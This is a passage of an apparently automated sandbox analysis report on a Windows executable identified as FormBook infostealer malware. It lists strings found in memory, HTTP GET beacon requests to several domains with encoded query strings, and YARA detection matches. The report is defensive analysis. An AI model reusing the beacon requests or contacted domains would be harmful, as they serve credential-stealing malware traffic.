64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.comasno
          Source: divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comX
          Source: divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.comn
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/c
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn_
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna-d
          Source: divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnl
          Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnr-f
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/.
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/CursJ
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Gras
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/Y0zS
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/a-e7
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/o
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/ri
          Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/t
          Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.coma-d
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.ribbonofficial.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: divpCHa0h7.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106D0641_2_0106D064
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106F2961_2_0106F296
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_0106F2981_2_0106F298
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_04F90D511_2_04F90D51
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 1_2_04F95A101_2_04F95A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0040102D5_2_0040102D
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B8D35_2_0041B8D3
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041B8D65_2_0041B8D6
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041C98B5_2_0041C98B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_0041C3435_2_0041C343
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00408C8B5_2_00408C8B
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00408C905_2_00408C90
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402D8C5_2_00402D8C
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00F2B0905_2_00F2B090
          Source: C:\Users\user\Desktop\divpCHa0h7.exeCode function: 5_2_00FD10025_2_00FD1002
